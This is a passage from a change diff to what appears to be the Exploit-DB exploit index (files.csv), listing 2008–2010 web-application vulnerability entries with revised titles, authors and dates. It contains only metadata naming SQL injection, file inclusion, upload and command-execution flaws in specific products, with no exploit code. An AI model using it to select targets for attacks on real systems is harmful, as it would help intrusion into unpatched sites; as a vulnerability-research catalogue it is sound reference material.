6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0
6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - (searchid) SQL Injection",2008-08-06,james,php,webapps,0
6215,platforms/php/webapps/6215.txt,"pPIM 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0
6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - 'searchid' Parameter SQL Injection",2008-08-06,james,php,webapps,0
6215,platforms/php/webapps/6215.txt,"pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting",2008-08-10,BeyazKurt,php,webapps,0
6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps,0
6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,php,webapps,0
6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - forums[] SQL Injection",2008-08-10,irk4z,php,webapps,0
6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final - (startup.php) Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0
6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' Parameter SQL Injection",2008-08-10,CraCkEr,php,webapps,0
6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - SQL Injection",2008-08-10,irk4z,php,webapps,0
6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final - 'startup.php' Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0
6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 - Insecure Cookie Handling",2008-08-10,"Virangar Security",php,webapps,0
6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injections",2008-08-10,"Virangar Security",php,webapps,0
6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0
6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - (bannerclick.php adid) SQL Injection",2008-08-11,"Hussin X",php,webapps,0
6231,platforms/php/webapps/6231.txt,"pPIM 1.0 - (upload/change Password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0
6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - (item) SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0
6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - (mod) SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0
6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - 'image.php' SQL Injection",2008-08-10,nuclear,php,webapps,0
6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - 'adid' Parameter SQL Injection",2008-08-11,"Hussin X",php,webapps,0
6231,platforms/php/webapps/6231.txt,"pPIM 1.0 - upload/change Password",2008-08-11,Stack,php,webapps,0
6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' Parameter SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0
6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' Parameter SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0
6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0
6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - (img) Remote File Disclosure",2008-08-13,JIKO,php,webapps,0
6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Multiple Local File Inclusion",2008-08-15,Don,php,webapps,0
@ -19577,7 +19582,7 @@ id,file,description,date,author,platform,type,port
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - (notes.php id) Local File Inclusion",2008-10-04,JosS,php,webapps,0
6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - 'notes.php' Local File Inclusion",2008-10-04,JosS,php,webapps,0
6669,platforms/php/webapps/6669.txt,"JMweb - Multiple (src) Local File Inclusion",2008-10-04,SirGod,php,webapps,0
6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps,0
6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload / Information (c99)",2008-10-05,JosS,php,webapps,0
@ -19720,7 +19725,7 @@ id,file,description,date,author,platform,type,port
6861,platforms/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution (mq = off)",2008-10-28,StAkeR,php,webapps,0
6862,platforms/php/webapps/6862.txt,"H2O-CMS 3.4 - Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0
6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - (board.cgi) Remote Command Execution",2008-10-29,GoLd_M,cgi,webapps,0
6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (File Disclosure / Arbitrary File Upload / Directory Traversal) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0
6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - File Disclosure / Arbitrary File Upload / Directory Traversal",2008-10-29,GoLd_M,php,webapps,0
6866,platforms/php/webapps/6866.pl,"7Shop 1.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0
6867,platforms/php/webapps/6867.pl,"WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0
6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0
@ -20520,7 +20525,7 @@ id,file,description,date,author,platform,type,port
7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection",2009-01-28,certaindeath,php,webapps,0
7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0
7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0
7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0
7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote File Upload",2009-01-29,"Michael Brooks",php,webapps,0
7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0
7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
@ -20644,7 +20649,7 @@ id,file,description,date,author,platform,type,port
8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure",2009-02-20,Pouya_Server,php,webapps,0
8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection",2009-02-20,Osirys,php,webapps,0
8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated",2009-02-23,ahmadbady,php,webapps,0
8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution",2009-02-23,JosS,php,webapps,0
8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0
8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - (jobid) SQL Injection",2009-02-23,K-159,php,webapps,0
@ -20788,7 +20793,7 @@ id,file,description,date,author,platform,type,port
8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0
8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0
8394,platforms/php/webapps/8394.txt,"moziloCMS 1.11 - (Local File Inclusion / Full Path Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-10,SirGod,php,webapps,0
8394,platforms/php/webapps/8394.txt,"moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting",2009-04-10,SirGod,php,webapps,0
8395,platforms/php/webapps/8395.txt,"RedaxScript 0.2.0 - 'Language' Local File Inclusion",2009-04-10,SirGod,php,webapps,0
8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0
8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps,0
@ -22811,7 +22816,7 @@ id,file,description,date,author,platform,type,port
12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0
12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
12132,platforms/php/webapps/12132.pl,"Joomla! Component 'com_agenda' 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0
12132,platforms/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0
12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0
12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,php,webapps,0
12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0
@ -22829,7 +22834,7 @@ id,file,description,date,author,platform,type,port
12147,platforms/php/webapps/12147.txt,"Joomla! Component 'com_preventive' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12148,platforms/php/webapps/12148.txt,"Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0
12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12150,platforms/php/webapps/12150.txt,"Joomla! Component 'com_alphauserpoints' 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12151,platforms/php/webapps/12151.txt,"Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12153,platforms/php/webapps/12153.txt,"Joomla! Component 'com_education_classess' - SQL Injection",2010-04-11,bumble_be,php,webapps,0
12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0
@ -22842,10 +22847,10 @@ id,file,description,date,author,platform,type,port
12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0
12166,platforms/php/webapps/12166.txt,"Joomla! Component 'com_webtv' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12167,platforms/php/webapps/12167.txt,"Joomla! Component 'com_horoscope' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12168,platforms/php/webapps/12168.txt,"Joomla! Component 'com_arcadegames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12170,platforms/php/webapps/12170.txt,"Joomla! Component 'com_AddressBook' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12171,platforms/php/webapps/12171.txt,"Joomla! Component 'com_advertising' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12170,platforms/php/webapps/12170.txt,"Joomla! Component Address Book 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12171,platforms/php/webapps/12171.txt,"Joomla! Component Advertising 0.25 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12172,platforms/php/webapps/12172.txt,"Joomla! Component 'com_cvmaker' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12173,platforms/php/webapps/12173.txt,"Joomla! Component 'com_myfiles' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12174,platforms/php/webapps/12174.txt,"Joomla! Component 'com_onlineexam' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
@ -22889,8 +22894,8 @@ id,file,description,date,author,platform,type,port
12235,platforms/php/webapps/12235.txt,"Joomla! Component 'com_lovefactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12236,platforms/php/webapps/12236.txt,"Joomla! Component 'com_jacomment' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12238,platforms/php/webapps/12238.txt,"Joomla! Component 'com_blogfactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12239,platforms/php/webapps/12239.txt,"Joomla! Component 'com_beeheard' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard 1.0 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0
12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0
@ -22913,7 +22918,7 @@ id,file,description,date,author,platform,type,port
12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0
12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0
12280,platforms/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0
12282,platforms/php/webapps/12282.txt,"Joomla! Component 'com_archeryscores' 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
12282,platforms/php/webapps/12282.txt,"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
12283,platforms/php/webapps/12283.txt,"Joomla! Component 'com_zimbcomment' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12284,platforms/php/webapps/12284.txt,"Joomla! Component 'com_zimbcore' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12285,platforms/php/webapps/12285.txt,"Joomla! Component 'com_gadgetfactory' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
@ -22997,7 +23002,7 @@ id,file,description,date,author,platform,type,port
12426,platforms/php/webapps/12426.txt,"Joomla! Component 'com_ultimateportfolio' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12427,platforms/php/webapps/12427.txt,"Joomla! Component 'com_noticeboard' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12428,platforms/php/webapps/12428.txt,"Joomla! Component 'com_smartsite' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12429,platforms/php/webapps/12429.pl,"Joomla! Component 'com_abc' - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
12429,platforms/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
12430,platforms/php/webapps/12430.txt,"Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
@ -23242,7 +23247,7 @@ id,file,description,date,author,platform,type,port
12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component 'com_mycar' - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12780,platforms/php/webapps/12780.txt,"Joomla! Component 'com_bfquiztrial' - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
@ -23254,7 +23259,7 @@ id,file,description,date,author,platform,type,port
12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0
12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0
12796,platforms/php/webapps/12796.txt,"Joomla! Component 'com_bfquiztrial' - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
12796,platforms/php/webapps/12796.txt,"Joomla! Component BF Quiz 1.0 - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,php,webapps,0
12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0
12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0
@ -23268,7 +23273,7 @@ id,file,description,date,author,platform,type,port
12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0
12814,platforms/php/webapps/12814.txt,"Joomla! Component 'com_g2bridge' - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0
12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0
12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0
12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
12820,platforms/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0
12822,platforms/php/webapps/12822.txt,"Joomla! Component 'com_jsjobs' - SQL Injection",2010-05-31,d0lc3,php,webapps,0
@ -23505,7 +23510,7 @@ id,file,description,date,author,platform,type,port
14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0
14057,platforms/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Exploit",2010-06-26,sebug,php,webapps,0
14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload Exploit",2010-06-26,Net.Edit0r,aix,webapps,0
14059,platforms/php/webapps/14059.txt,"Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0
14059,platforms/php/webapps/14059.txt,"Joomla! Component JE Awd Song - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0
14060,platforms/php/webapps/14060.txt,"Joomla! Component 'JE Media Player' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps,0
14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps,0
@ -23587,7 +23592,7 @@ id,file,description,date,author,platform,type,port
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla! Component 'com_addressbook' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla! Component Address Book - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14211,platforms/php/webapps/14211.txt,"Joomla! Component 'com_ninjamonials' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0
@ -23613,7 +23618,7 @@ id,file,description,date,author,platform,type,port
14243,platforms/php/webapps/14243.txt,"BS Events Directory - (articlesdetails.php) SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0
14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14245,platforms/php/webapps/14245.txt,"Pre Multiple Vendors Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0
14249,platforms/php/webapps/14249.txt,"Joomla! Component 'com_autartimonial' - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14249,platforms/php/webapps/14249.txt,"Joomla! Component AutarTimonial 1.0.8 - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0
14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps,0
14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0
@ -23621,7 +23626,7 @@ id,file,description,date,author,platform,type,port
14260,platforms/php/webapps/14260.txt,"Sijio Community Software - SQL Injection / Persistent Cross-Site Scripting",2010-07-07,Sid3^effects,php,webapps,0
14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0
14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps,0
14263,platforms/php/webapps/14263.txt,"Joomla! Component 'com_artforms' 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0
14263,platforms/php/webapps/14263.txt,"Joomla! Component ArtForms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0
14265,platforms/php/webapps/14265.txt,"Joomla! Component 'PaymentsPlus' 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0
14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injection",2010-07-08,Callo,php,webapps,0
14271,platforms/php/webapps/14271.txt,"Pithcms - (theme) Local/Remote File Inclusion",2010-07-08,eidelweiss,php,webapps,0
@ -23752,7 +23757,7 @@ id,file,description,date,author,platform,type,port
14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0
14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps,0
14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - modules.php SQL Injection",2010-08-02,secret,php,webapps,0
14530,platforms/php/webapps/14530.txt,"Joomla! Component 'com_camelcitydb2' 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0
14530,platforms/php/webapps/14530.txt,"Joomla! Component CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0
14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting",2010-08-02,"Juan Manuel Garcia",php,webapps,0
14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0
14558,platforms/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps,0
@ -23774,7 +23779,7 @@ id,file,description,date,author,platform,type,port
14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,php,webapps,0
14592,platforms/php/webapps/14592.txt,"Joomla! Component 'com_yellowpages' - SQL Injection",2010-08-09,"al bayraqim",php,webapps,0
14595,platforms/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,php,webapps,0
14596,platforms/php/webapps/14596.txt,"Joomla! Component 'com_amblog' 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps,0
14596,platforms/php/webapps/14596.txt,"Joomla! Component Amblog 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps,0
14606,platforms/multiple/webapps/14606.html,"Zendesk - Multiple Vulnerabilities",2010-08-10,"Luis Santana",multiple,webapps,0
14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Inclusion",2010-08-11,Offensive,php,webapps,0
14615,platforms/php/webapps/14615.txt,"phpMUR - Remote File Disclosure",2010-08-11,Offensive,php,webapps,0
@ -23869,7 +23874,7 @@ id,file,description,date,author,platform,type,port
14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
14915,platforms/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0
14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
14922,platforms/php/webapps/14922.txt,"Joomla! Component 'com_aardvertiser' 2.1 - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0
14922,platforms/php/webapps/14922.txt,"Joomla! Component Aardvertiser 2.1 - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0
14923,platforms/php/webapps/14923.txt,"WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps,0
14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,php,webapps,0
14927,platforms/php/webapps/14927.txt,"dynpage 1.0 - Multiple Vulnerabilities",2010-09-07,Abysssec,php,webapps,0
